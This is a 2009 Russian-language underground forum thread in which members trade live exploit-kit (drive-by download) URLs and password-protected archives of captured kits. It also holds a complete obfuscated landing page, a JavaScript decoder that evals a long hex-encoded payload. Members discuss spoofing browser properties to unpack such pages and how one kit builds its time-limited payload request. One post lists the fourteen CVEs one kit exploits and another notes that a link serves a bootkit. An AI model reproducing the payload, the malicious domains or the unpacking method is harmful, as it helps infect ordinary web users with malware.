Адреса связок

Mr.Di · 25.02.2009

Требования к выкладыванию сплойтов
1) Писать урл откуда был загружен сплойт
2) Все сплойты засовывать в архивы и прикреплять к сообщению аттачем
3) Ставить пароли на архивы со сплойтами-связками dl.org

очень прошу соблюдать сие, ибо:
1) при постинге меняется и бьется структура
2) выкладывать сплойты плайном в аттач оч плохо, ибо орут аверы, фаеры и тд.
3) ну и хочется самому еще проверять на разные сочетания юзер-агентов.

Надеюсь на уважение и понимание.

Собсна так как многие любят сами поковырять сие вещи, решил создать топ, где люди могут/будут/не обязаны публиковать адреса связок которые они увели/хотят увести/не хотят уводить дабы другие могли поковыряться. делитесь - не жмитесь) начну пожалуй я как тс.

newprogress.tv/fo/
federalreserve.banknetworks.net/bb/
reddii.ru/traffic/sploit1/

пока то, что последнее

el- · 25.02.2009

ну и чо лаки с банкнетворк снял ? ( я щас утилиту пишу что бы посмотреть его )

Mr.Di · 25.02.2009

работаю над этим
там сначала надо убить все рандомы, всю херню зависящую от времени, потом уже запускать. на текущий момент вытащил вот что. вытаскивал под ИЕ, ибо как там видно, возможно три различные версии генерируемого доп-сорса. дом модель обходил этим

Код:

function my_navigator () {
    this.appCodeName = "Mozilla";
    this.appMinorVersion = ";SP1;";
    this.appName = "Microsoft Internet Explorer";
    this.appVersion = "4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)";
    this.browserLanguage = "en-us";
    this.cookieEnabled = "true";
    this.cpuClass = "x86";
    this.onLine = "true";
    this.platform = "Win32";
    this.systemLanguage = "en-gb";
    this.userAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)";
    this.userLanguage = "en-gb";
};

navigator = new my_navigator;

в общем часть под ИЕ я вытащил, осталось под НЕ Netscape и под остальные брузёры+проверить на разные весии флеш плейеров, пдф-ов и на возможность эксплуатирования МДАК. дальше лень просто делать, начало дано, кто хочет - ковыряйте.

Mr.Di · 27.02.2009

www.893500.cn/2/
deabak.com/z.js
http://ntrjj.cn
http://www.sll9026.cn/a5/fxx.htm
toureg-cwo.ch/fta/index.php
gavai-pegc9.ws/bI/index.php
prororo7.net/sp/index.php
dvcd.info/evo/count.php?o=2
211.95.79.58/y/index.php

остальное смотрите на малварьдомэйнах

el- · 28.02.2009

вот такого раньше не видел ... либо какой то новый криптор либо сплоент, в траф в основном фиесты, уникпаки ...
DiFor, если вытащишь .. .покажи

Код:

aaq2jcthr.com/cgi-bin/index.cgi?dx

Код:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<script type="text/javascript">
<!--
function   ImEhTdBbX(N4VRNxeKl){var  dNO0rn5TN   = location.href;;var sivDgIq3I    =    arguments.callee;;sivDgIq3I  =  sivDgIq3I.toString ();;;;var w318S7fy5    = sivDgIq3I +  dNO0rn5TN;;;;;var S00L7AcHW   =   "";w318S7fy5     =    w318S7fy5.replace(/\W/g,  S00L7AcHW);;;w318S7fy5    =     w318S7fy5.toUpperCase();var    pBX55B5LG   =  2147483648;;;pBX55B5LG  =   pBX55B5LG +  pBX55B5LG;;var     x436GpbvH  =   new Array;;;;;for(var  kJ517Ul7t     = 0;   kJ517Ul7t     <   256;    kJ517Ul7t++)    {x436GpbvH[kJ517Ul7t]    =    0;}var   E8i1J23Q1     =   1;;;var   olO3VNUJQ    =     1994146192;{}olO3VNUJQ  =     olO3VNUJQ   +     olO3VNUJQ;;;;for(var   kJ517Ul7t  =  128;     kJ517Ul7t;  kJ517Ul7t  >>=    1)    {E8i1J23Q1    =    E8i1J23Q1  >>>     1 ^     (E8i1J23Q1   &  1     ?   olO3VNUJQ   : 0);;;;for(var   PIrur1B5N     =    0;     PIrur1B5N  <     256;     PIrur1B5N   +=   kJ517Ul7t     * 2) {var    uee2fRji5    =  kJ517Ul7t  +  PIrur1B5N;;;;;x436GpbvH[uee2fRji5]     =    x436GpbvH[PIrur1B5N] ^   E8i1J23Q1;;if    (x436GpbvH[uee2fRji5]  < 0)   {x436GpbvH[uee2fRji5]  +=    pBX55B5LG;;}}}var  Hc0phjVeK    =    pBX55B5LG    -  1;;;;for(var  M66w8NKoH   =  0;   M66w8NKoH  <   w318S7fy5.length;   M66w8NKoH++)  {var    o6CewRtcQ     =    (Hc0phjVeK     ^  w318S7fy5.charCodeAt(M66w8NKoH))     &   255;Hc0phjVeK     =     (Hc0phjVeK    >>>     8) ^   x436GpbvH[o6CewRtcQ];;;;;}Hc0phjVeK   = Hc0phjVeK    ^ (pBX55B5LG   -  1);if    (Hc0phjVeK    < 0)     {Hc0phjVeK    +=    pBX55B5LG;;;;}Hc0phjVeK   =  Hc0phjVeK.toString (16).toUpperCase();;;;;while(Hc0phjVeK.length <     8)    {Hc0phjVeK = "0" +   Hc0phjVeK;;;}var   mT7KC78Q4   =     new Array;;;;;for(var kJ517Ul7t   =   0;    kJ517Ul7t  < 8;    kJ517Ul7t++) {mT7KC78Q4[kJ517Ul7t]    =   Hc0phjVeK.charCodeAt(kJ517Ul7t);}var  EDlr3UGis =  0;var  lwfC64LWa     =     "";;;;;for(var    kJ517Ul7t     =  0;  kJ517Ul7t  <  N4VRNxeKl.length;  kJ517Ul7t +=  2){var  uee2fRji5   =    N4VRNxeKl.substr(kJ517Ul7t, 2);;;;;var Vu27B72YF    =   parseInt(uee2fRji5,   16);{}var  V2qdQdu5n     =     Vu27B72YF     -  mT7KC78Q4[EDlr3UGis];;;;;if(V2qdQdu5n     <  0)  {V2qdQdu5n   =     V2qdQdu5n  +  256;{}}lwfC64LWa     += String.fromCharCode/**/(V2qdQdu5n);if(EDlr3UGis     +    1     ==    mT7KC78Q4.length)     {EDlr3UGis =    0;{}} else {EDlr3UGis++;;;}}var   HhMx35DKs = 2;;;try   {ewlsdv     = eval;  ewlsdv(lwfC64LWa);;}   catch(e)     {HhMx35DKs   =     1;;;;;}try     {if   (HhMx35DKs  ==     1)     {window.location     =     "/";}}     catch(e) {}}
//-->
</script>
</head>
<body onload="ImEhTdBbX('9dA9a2A4b99eB4b4575454b1ae99797b9a9F8c776d988c928c9C65A47b686eC1ad95a6616582aa7d6C69adAC77656566577154ADb498a6baa0a3a26FADa7aaAC726fAAa2b7558cAAa164a995866cbc665754547E6555656698a69bB6b29ab3BAAA6297A2b1a1aaab726f7Ba5AF65ba9a786BAB61657265667E989e71BA89867dAE62A8b098A9b7afA59b54696e70808172aa95B365ad959Cad8366B398656566575471618C99af76AC887578bc557066578199787A6AbeB169646F7c807080BC98a654b7B1a6A6958BAB989265556583575454636770BD968daa8373b7887566575454618255656657ac8497bb8477b88A6462B3aaA5B1a79A995C70A18C74AD635454B7b1a6A6958bab98926e708081af848ab79467b7996754546165726566575454B9958bbb9569a6877173a9b49BA7a499B38896b8ab5F5D6fb7a6a765665754a4B394ae76776767AC6165558266576665757C697d796D686c7C8070b5b886ad65727568BD665771546165a5b795B065657178AD65715754a4B394AE76776767AC7c80abA6b857545461659CBC8eAEab7c737b7B656674545461b39abc6678A6A6A2be708081726f9AB0b75DBBA7A954548DAF799E79a27a8b8c655565665771547180556566839E789a78a08B9D8254546165558166575466767b706566575480ab898E78b17d8b7f6c705E65665754afa8BC7Dbcbd7f666A87a081af8A90679F879c80a2665754547e65556566676Fb1B7a6a76566579CAC85957F9694836754616555658357545472807080BC98A654616589B7AA9B876c84b3AA65665754716165556566686D6d7576697b7770666FBCC289B7aa9B876c84b3AA656674545461655599b89b98877988a3ba6657545f61655565668ba698A5986d88b4ac6F6F7C809BB4B85FAA95b365556592A1788d74B07b9c91575471616566777E72545461655591b07B8D67ac8B8c9081575480ab898E78b17D8B7F616573838357545461765e65665754afA9bd799590888280746555656674545461659dBD8a877e858F91686566757272616555656668549261655565665f9cAC85957f969483675461655b65666854546165558466575488B3A999987E7aA2A96165557F66675d6F7C8070ABB5A95Caaa2B755656690AC7FB1BD7A94926754546165558266575454718055656657548Db990a5bd8b8680646165716566575454737A6b8066575454619Ead90b6AF79838d75556566627154616581af8A90679F879C8065665754546B65676e66B2AA95b36555656690a06Baa786C7bB56754546165726566839E789a78A08b9D8254546c65559eBE82A4ac8694817581726F6F7cACac8dBDAE7C66778b909Eb26e9D67787Ba475a3575454616572656657549Bb88dACBC8E696A7A9c9Ead90B6AF79838d759265A4575454a9bd799590888280748070aeac575454616D9cBC8eAEab7c737b7BA09Fa36B9D747C6Bb4769454547D65656e665754AFa8BC7dbcbd7f666a87a08EB17da0676B77b465A266575f7161655565b6A983ad72766578BE726fB1beC2ABA6B857549bA6BA67b278868366616555658357545461b5a794bf68656474BD5565665761546176708081729AA3B36dabA6B8575482B799A98677676883616555826657646F61655593bc8bA87572756994665770546165ad959cad8366B3986573b29Ca29Bb5ad7065665782AA95B97676766b835F6C6e5565c1AD95A661655565966799817299A57c91575454616572656657545Ca8aaAA77B3698383736555656657925461bd859BBC8666a6947563A8AE98a677b0A99a86ba5F82aa95b97676766b835D6a65556566575a546165677a7B729B99b677A27795866654616555658357545461655DACABAC66a173948477665754547F83736566575454796E55A36657549Bb88dACBC8E696A7A9c9565AA936888a47890928081726F6fbeAC9Aba78a46683907755656674549bA6BA67b27886836661655565A4575CA4b394AE76776767ac616555726657655D7cae9b656657545CA8AAAA77b369838373655565667354646a6555656657af9BA6ba67b27886836661655565717454546165a5B795b065657178AD8081726fb1A8AAAA77B3698383736555658357549bA6BA67B2788683666fb9a498BAA99dA2a8655D767C6062A8b09Aa5b5abA97795B4aa5d6e81726f6f7Cbc9DaeB29C5C9Ba6BA67b2788683666FB19AB3adab9c547d65556566576c5d61655565C19e99A973b2679495695471616765676662545461AC9aba78a466839077708081B4aa95b365556598a3a082a5b182AA935754547e6555656657a299B86576b7B898ad6F7C807080ACa6a65Cb7a6a76592a1788D74b07B9C915754547E65556576725454616581af8a90679F879c80656673546C7c65556566839e789a78A08B9d825F5f6a65b097B2a38298ad929A92a1839E789A78a08b9d829154616555826657549ba6BA67b2788683666fa89Da6b87aA398a686A96D92A1788D74B07b9C91606fb1B7A6a765668D6B7E7791A093B7ad547161656580BC98a654618867979685997574a9556566575471616555656659566F7c807080aca6a65CB7a6A76566575480ab898e78b17D8B7F61655565667454547180556592a1788d74B07b9c915754706165988c928c9C65a47b6873B29CA29Bb5ad706566839e789a78A08B9D82545f7E6555776Fb2AA95b365559Eb26E9D67787BA4756657547161655565A97E8089a976987B7965a7a9a3B8a9b76e839e789a78A08b9D826054736e708081726fAAa2b7558dAA8e859Fa98a7C8b665754547e655565b698a6a7A68EA3B96E90a06BAA786C7bB56760546165667B6F72AFB1B7A6A76566908684718d829C7C6F54546165558266575454618D999c97A29c79888B556566575461616587B1B28598a08eaa82A09c6E7e6A8DB083b6bc946F6F7C8070AEac5F8d8691757d929d6d6c5461655565825754646A6555c09f89846489928c7b7e5754547e65556566578d8691757D929D6D6C5461705565786C6a6FbcC2B28878898482a68668a9665754546170726599ABa69dafAC63abb8a6A177A9a6A788B59B99636b6F646D9F89846489928c7B7e606F9da76d8b7c906D809F8FB6ab65665754546c6555656668545461655582835754546197a1B1949bA081A69263B1ABA59BA8a96e5565665754AF977c7F7B92a282A5B7657265665754647Cc0B2c2669ca0a7a665b09b7D816A80ac93A6BB71626f6f7cC2B2BBA7A954546189A29D91989D677989558266696F6f7Cb9A7be665754AFA6BCa1B8aaad545461655582669Caa95ad805565ABAEA0a7a5bb5d8878898482A68668a96F726fB1616555A8a7AB979C69aa5E6566575454BC89a29D91989D6779895565667454546165557681726f6f7CC2A9b7bf5754546165b0aeAC5754546989a29d91989d677989556583745454616555766F5754546165B0BCAFa598a3b873a1B4a998A89DB0B355656657547161655565665963567cc2B26566575454a4a6A9A8ae5f995D61c0B2C250A79D98757A98b09e6d5c5B7aA66EAB876B95967Aaa6e8Aa869966A7779967b7E7c756B797c6Ea9a867956D82766a757D7C696a77776C797B6868977a866eABa76B95967a8a6E8a8869766a777976757F6d9596797d6eaba76D7666787e6A757D9c696A77776c797b6868777A866E8Ba76b95967Aaa6EAA8869766A777976787F9995987879767Da86D7575787c6a757d7c696A77776C797b6868777578688687786D9776766B767C6C756aA27A6e78a86D75677A7b767CA86f6B64787C6ca9a76D6d6d7aA76D7C7f68956b768b6a75887A686774A7697B7A9C766c7a7C76777C686D6B7A7a76767E6e75677a7a6DABA8706b65748a697888789567827D6a757E696b75797e6BA9877B6d65827C76787C686b677676967c876C966C7a8b6e7C87699595827576877d699567A27b76757E9c6d7a7A8B767d886d6d6c7aa77677886b6D7a8275767c7d7D689A7575767BA769756c76766E877f706D95A2A86e77A86A6d7579756a7e7e686a6677786B767a7C6864827c6Ea6A86D6A667a896E7Da8686D997a776D7d7e6E6d6C767b6b897C68696C77766b867c6D6B78757868a67a9c6864a27D9676a79b95997aa76A7D7c706D6C797B6E76a8987568827d6e797F67696A77AA6a7e7E6c6c6A79AA6B79A7986c69A27796A87D697576a2796e79876d959979756e8B7C7a6A6878766d787f68696C76a96a7e876D6d6b79aa967B876A956C7a7A6d7D7C9D6b67768B6a7E7C68696B77aa6A7e7D686b6776ab6A75887a68677487697788789567a27d6A75a8676a9a787a767B7F6C756879896c867c686b6776766CA67e6F6d7577A66E7e7F67756B82796b7Ca76E95957A7C76777e697575767E6ea77f706d95a2A86e77A86a6d9579756B797d6e6A76787668897a99686774876977877b756C767B6a7Da8676A9A787a967b7f6c756879A96Ca67c686b6777AA6A7E7C6d6b67767d6A7e7a7c686474866977a7997575827b6e7d87696c6978796DAB7C6B6b9A767B6A777D686A6C76786C797B686877748b6e7A877b956d7A7b6A7e877B756c767B6A7d88676a9a787A767B7f6c956879896Ca67c686b67778A6a7E7C6d6B68767D6a7e7a7c686474a6697787797575A27b6e7d87696C6978796DAB7C6B6B9A767b6A777d686A6d76786C797B686897748B6e7a877b956D7A7b6a7EA79b756C767B6A7d88676A7A787a967b7F6C756879A96CA67C686b67778a6A7e7c6D6b69767D6A7e7a9c68647486697787799595827b6e7da7696c6978796dAB7C6b6B7a767b6a777d686A7576786c797B68687774AB6e7AA79b756D7a7b6a7ea79b956c767b6a7Da8676A7a787A767B7f6C756879A96C867c686b67778A6a7E7C6d6B6A767D6a7E7a7c686474A6697787799595A27B6E7D87696c6978796Dab7C6b6B7a767b6A777d686a7676786C797B68687774AB6e7aA79b756d7a7B6a7E877B756c767B6A7Da8676A9a787a767b7F6C756879896CA67c686B6777AA6a7E7c6d6B6b767D6A7E7A7c686474A66977a7999595827b6E7D87696c6978796dAB7C6B6B9a767B6A777D686A7776786C797b68687774ab6e7A877B956D7a7B6A7EA79b756C767b6A7D88676A7a787a767b7F6C956879A96Ca67c686B6777aa6A7E7C6d6b6c767D6A7E7a9c686474a66977A7999595a27B6E7D87696C6978796d8b7C6B6b7a767b6A777d686a7876786C797B686877757868867a986D7A7A7c6A7E7C9a956D7a8a967587706d6b79756c887F986a66767C6B897c68696C77766ba67C6D6A96757868867a78679A7A787687a7709567A2766BA77a9C6864a2AA697B7A7c689a75756e7eA76e696a767e9675a79A96667aAA6E767f676B6d797c6A7E7E686B7A767B6A777D686a6b76786a7E7C786A6c767b6c767E6c6C99777a96777f6A7667827E6AaaA79895687A7A6EaaA89a6d657aA86a7D7C6A6c6C7A7b967Aa7707567A27E6E7a7c686b6D7A77767cA76f75767A866E76886c6d7676786b7a7c6b6B66768B6a757C696b6776766b7B7d6c6A76757868867A986d987A7e767e877A7567797A6C787f6E696a77aa6A7E7c6D6B6677aa6a777d9a68677487697B7a9C689a7575767BA769956c767696ab877D6C77798A6d867e7C956a787a6A7E7E686a6682796E76A86e6D9A7A7D6E86886f7665A27d6aAA886b757Aa2797689a770757a79776E76877d6D98a27b6eA68779756B77797678886D6D6C827996A9a86D6A75777b6aa87c686A6b77766B777D7D687a7575967B8769756C767677777F986C9a78866cabA8996c6978a66a7E7E686A66767D6A777d7a68677487697b7A7c687A75756E7b8867956C767E96aba76C7668767b6C8b7f6c6c777a756e76A76E7579828a6Ba97D686B6579756DA97f987565798A6e78a79b959977A9768B877D6c7779aa6DA67e7c756a787A6B7CA867956BA2796E7CA86C6d9977a86D7D7f6F6d6C7A7A6d7dA76b7566827E6B797C9d6A96767b96a77A7c686474A66CA7a89C966a7a7E967D7D6e6C6D7A776A7E7e686a66a2a86Ea77E996c9979A76D7B886B6C6a77796E7887706D6ba2786Ca8886A956A7aa76C76886C699979756Da97F98956579AA6e78877B757976866B7c886f7665797e9679A86a6D7A7aab76757C9A6B6777886A7E7D9a68677487697b7A9C68967AAB6e7B7C68697978787778886f7569a2aa6B7B7f6b6d6B76766C7A7c6b6B6876AB68897A79679A74A677777f986C9a78866Caba8996C6978A66A7E7C9d6B7a767b6A777D68696C77A8697B7A9C689A7575687eA8986c7778AA6C897F6a9697797A6C7E7C686a6577aa6a7E7E6D767782866E78a8706A9779796EA67d7D689a757576897A7c6864748A6978A89995957A8b6ea8A76d697982866d8B7F686C6A797A96A67f676b7A768b967aa77076647AA996798770696a77896A7E7D6d6b66768b68a97a99677A82866Dab7F686c6A797a76867F676B7A76766B797e686a66767D6b757d68696c7788697B7a9C689A757568897A7995977A7796a77C6B95677aA66E7d7e6b6D6b7a756e7dA89a6A6678786a75A76F6d79a2769676876C6d65787E6D7B7C686A65767677777f786C9A78A66Caba8996C6978a66c797b686897a2A86E76886A696A797876767d996D68787c6B757d98757776766c7B7c6b956aA27A6e78886d75677A7b967C886F6b647A7E7677a76d6d6b827A6EAA7E7075797A876E89876D7568827a6b767C6d96697a7E76778778956AA27a6a877C9b6b78757868867f6a6D79777D6d877e6C6b6677ab767B7c7D756d7A7B76897E6C966a8286967787786d6c827b96a9A7706a75767D7679a898956A7a7B6Aa77d676a66767d7679876d7579a27a6b7d877C7567a2a86E76a86B6D6da2787677886B766a767d6A7E7d7a686774876D87a79a6b6d797d6c767D686A7a827c6b7C886E756ba2A66C76A86c757582787677A76d966ba2A66E7A7C70696Ca2797687876E6a6877776a757c6A6d99827a7689886B6B77777a6A8ba7696D6BA2776b87877c956982866E7d886A6a687A79767D88686B657A7E6E7c87786A677A78967788696b657AAB6eAA876c6d76827E6b7c876E956d7aab6b8b876E6A987a776Baaa76D6b687Aa76B777d686a6B77766B7E87786B6677896B757d686A6a77776E8a7d7B6b6C77866B7a7d6D6A6C77766bab7d9B6b6777A96E76a7696a6B77766EA97D6B6b687a7D6E7A7D686d6D7a7b6Bab7D6E6B6C7A886E7B7c6A696A76a86A7eA76C756a7A8a6C7887696D697A7577767C7B6B9875786886876c75697a79768A8868956Ba27996797C9d6D6ca2756eA9A89B6b647A7C767588686D767A8b6EA97E6e75757AAB6E88A76c6999797896767D796D68787C6B757d98757776866C797B686877A37868a97A795b5D7C')">

</body>
</html>

py4ka · 28.02.2009

:blink: хороший крипт. Под каким браузером вытаскивалось?

Mr.Di · 01.03.2009

el-
получите, распишитесь :P

el- · 01.03.2009

неосплоент ... кстати с этого линка грузится буткит ( очень интересная кроберская поделка

)

ammok · 01.03.2009

буткит? есть какая-нибудь более подробная информация?

Одинокий Волк · 01.03.2009

буткит? есть какая-нибудь более подробная информация?

Либо опечатка с руткит, либо буткит от англ. boot kit т.е. работа как к примеру каспер работает запускается до загрузки оболочки винды. Это я так думаю, а там хз ))

DeusTirael · 01.03.2009

Слышал про буткит несколько раз.
el-, розскажите нам по подробнее. (исходные сорцы приветвствуются)

el- · 01.03.2009

читайте там будет и про нео и собственно про буткит
www.viruslist.com/ru/viruses/analysis?pubid=204007635
зы. дифор попробуй снять сплоенты а то у меня чо не выходит ):
ззы. и бинарник если можно

[mod][DeusTirael:] Вот это какраз уже и видел \=[/mod]

Mr.Di · 02.03.2009

el-
вечерком ковырну

Mr.Di · 02.03.2009

короче проблема в следующем, запрос на получение файла составляется из некой переменной которая как я думаю генерится по времени, например "76266c330100f060001e9645520600000000023f8d8289ff". версии установленного СП, принимает значения от 01 до 08 (02-07 для паков, 01 для неустановленного пака и 08 для некой хрени имеющей статус "Release Candidate"). языка системы "navigator.systemLanguage", а точнее переведенного в формат hex(navigator.systemLanguage). то есть на примере "systemLanguage = "en-us"" получится строка вида "656e2d7573" и далее она дополняется нулями до достижения длинны в 20 символом "656e2d75730000000000". потом все полученные строки складываются и получаем линк вида h++p://aaq2jcthr.com/cgi-bin/index.cgi?76266c330100f060001e9645520600000000023f8d8289ff02656e2d75730000000000.
Теперь в чем проблемы, проблема в том, что на то, что-бы снять два уровня крипта и получить финальный линк у меня уходит в лучшем случае минута. Разработчик связки явно установил ограничение на "время жизни" переменной, к пример "на запас" 20-30 секунд (я бы именно так сделал). если получится раскодировать вот это "76266c330100f060001e9645520600000000023f8d8289ff" или понять алгоритм его генерации, то будет просто шикарно, можно будет попробовать в "нужное время" запросить содержимое файла. вот такая ситуация получается. разрабам +1))

Mr.Di · 02.03.2009

йесть, йесть, йесть!!!
:zns5:

Скачать|Download
:zns3:

Пароль: dl.org

Mr.Di · 02.03.2009

для желающих поковыряться еще
http://erotic-adventure.com
и в аттаче новый лаки)

el- · 03.03.2009

DiFor, спасибо большое ...
з.ы. а чо нового в лаки появилось ?

DeusTirael, другого нету

Mr.Di · 03.03.2009

el-
да просто для разминания мозгов) нового нет ничего, рса крипт, пример такого-же на этой странице есть. чуть алгоритм помменяли и всё)

http://erotic-adventure.com/ - эта хрень вроде как несет на своем борту 14ть сплойтов
SuperBuddy LinkSBIcons CVE-2006-5820
Office Snapshot Viewer CVE-2008-2463
WksPictureInterface CVE-2008-1898
OurGame various errors SA30469
GomPlayer OpenURL CVE-2007-5779
QuickTime RTSP CVE-2007-0015
NCTAudioFile2 SetFormatLikeSample CVE-2007-0018
Creative CacheFolder CVE-2008-0955
Windows Media Encoder CVE-2008-3008
Yahoo! Webcam Uploader CVE-2007-3147
Aurigma Photo Uploader CVE-2008-0660
Yahoo! Webcam Viewer CVE-2007-3148
Adobe Collab overflow CVE-2007-5659
Adobe util.printf overflow CVE-2008-2992

el- · 03.03.2009

DiFor, это фиеста

Mr.Di · 03.03.2009

OMG, понятно, туперь будет знать врагов в лицо
а про новый лаки не знаешь что это?

Адреса связок

(L1) cache

Старожил форума

(L1) cache

Вложения

(L1) cache

Старожил форума

RAM

(L1) cache

Вложения

Старожил форума

(L1) cache

CPU register

(L1) cache

Старожил форума

(L1) cache

(L1) cache

(L1) cache

(L1) cache

Вложения

Старожил форума

(L1) cache

Старожил форума

(L1) cache